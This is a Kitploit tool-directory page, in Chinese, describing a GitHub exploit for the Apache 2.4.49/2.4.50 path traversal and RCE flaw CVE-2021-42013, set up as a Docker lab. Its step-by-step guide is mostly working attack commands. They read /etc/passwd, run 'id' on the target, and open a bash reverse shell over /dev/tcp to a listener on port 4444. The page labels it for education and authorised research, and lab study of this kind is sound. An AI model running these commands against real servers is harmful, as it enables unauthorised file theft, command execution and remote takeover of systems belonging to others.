Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-42013 — Apache 2.4.49/2.4.50 路径遍历与 RCE 漏洞利用(CVE-2021-42013)。包含 Docker 环境搭建及用于测试路径遍历、执行命令和获取反向 Shell 的脚本。 | Kitploit
工具/GitHubGitHub/asepsaepdin/cve-2021-42013
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育远程访问工具实验室与实践
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

Apache 2.4.49/2.4.50 路径遍历与 RCE 漏洞利用(CVE-2021-42013)。包含 Docker 环境搭建及用于测试路径遍历、执行命令和获取反向 Shell 的脚本。

查看仓库
1151年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-42013 - Apache 2.4.50 路径遍历与远程代码执行 (RCE)


⚠️ 仅供教育和授权的安全研究使用

原始漏洞利用作者

非常感谢原始 PoC 作者 Walnut Security Services Pvt. Ltd

描述

攻击者可以利用路径遍历攻击,将 URL 映射到由 Alias 类指令配置的目录之外的文件。如果这些目录之外的未受通常默认配置 "require all denied" 保护,这些请求可以成功。如果 CGI 脚本也对这些别名路径启用,则可能导致远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,不影响更早版本。


步骤指南

  1. 首先,克隆仓库

    git clone https://github.com/asepsaepdin/CVE-2021-42013.git
    
  2. 切换目录

    cd CVE-2021-42013
    
  3. 构建漏洞容器

    docker build -t CVE-2021-42013 .
    
  4. 运行临时容器

    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  5. 检查容器 IP 地址

    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  6. 赋予脚本可执行权限

    chmod +x cve-2021-42013.sh
    
  7. 为测试并确认路径遍历,需要找到一个有效目录,本例中配置为 /icons。因此,执行以下命令将触发路径遍历漏洞并打印 /etc/passwd 的内容:

    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  8. 为测试并确认远程代码执行,应配置并启用 CGI,本例中为真。因此,执行以下命令将触发远程代码执行并打印 id 命令的输出:

    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  9. 从攻击者角度看,远程代码执行对于获取交互式 shell 至关重要。因此,执行以下命令将触发一个基于 bash 的传统反向 shell,连接到攻击者系统的 4444/tcp 端口:

    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    nc -nlvp 4444
    

致谢

  • https://github.com/walnutsecurity/cve-2021-42013
  • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
  • https://www.exploit-db.com/docs/50552
  • https://www.exploit-db.com/exploits/50406
下载工具